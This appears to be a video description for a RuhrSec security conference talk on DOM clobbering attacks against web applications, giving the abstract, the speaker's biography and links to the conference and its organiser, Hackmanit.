RuhrSec is the annual English speaking IT security conference with cutting-edge security talks by renowned experts. RuhrSec is organized by Hackmanit.
🔽 More information …
———
Talk // Everything You Wanted to Know About DOM Clobbering (But Were Afraid to Ask)
Abstract // XSS has been a major threat to webapps for the past 20 years, often achieved by script injection, and mitigated by disallowing or controlling script execution. But what if the attackers can obtain XSS with script-less markups? DOM Clobbering is a type of namespace collision attack that enables attackers to transform seemingly benign HTML markups to executable code by exploiting the unforeseen interactions between JS code and the runtime environment. Unfortunately, attack techniques, browser behaviours, and code patterns that enable DOM clobbering has not been studied yet, and in this work, we undertake that. Our study shows that DOM clobbering vulnerabilities are ubiquitous, affecting 9.8% of the top 5K sites, and that existing defenses may not completely cut them. This talk covers clobbering techniques, vulnerability detection, prevalence, indicators, and defense
———
Biography // Soheil Khodayari is a PhD candidate at CISPA, Germany, researching in the area of Web security and privacy testing, and Internet measurements. Soheil has presented and published his works on top tier security venues like IEEE S&P, NDSS, USENIX Security, Stanford SecLunch, and OWASP AppSec. He also serves as the AE PC of security conferences like USENIX and ACSAC. Among his contributions, Soheil proposed the first taxonomy and detection of XS-leaks, one of the first studies about client-side CSRF, the state of the SameSite adoption, and other client-side vulnerabilities.
Speaker //
Soheil Khodayari
[ Ссылка ]
➡️ Slides - Download
[ Ссылка ]
———
👉 Subscribe to our channel:
[ Ссылка ]
👉 Read more about interesting IT Security topics on our blog:
[ Ссылка ]
✍️ Want a deeper dive?
Training courses in Single Sign-On (SAML, OAuth and OpenID Connect), Secure Web Development, TLS and Web Services are available here:
[ Ссылка ]
———
🌍 RuhrSec conference website: [ Ссылка ]
🌍 Visit our website - Hackmanit: [ Ссылка ]
🐦 Follow RuhrSec on Twitter: [ Ссылка ]
🐦 Follow Hackmanit on Twitter: [ Ссылка ]
✔ Follow RuhrSec on Linkedin: [ Ссылка ]
✔ Follow Hackmanit on Linkedin: [ Ссылка ]
Follow Hackmanit on XING: [ Ссылка ]
———
Thanks for your attention and support. Stay secure. 🫶
#XSS #DOMClobbering #hacking #itsecurity #itsicherheit #cybersecurity
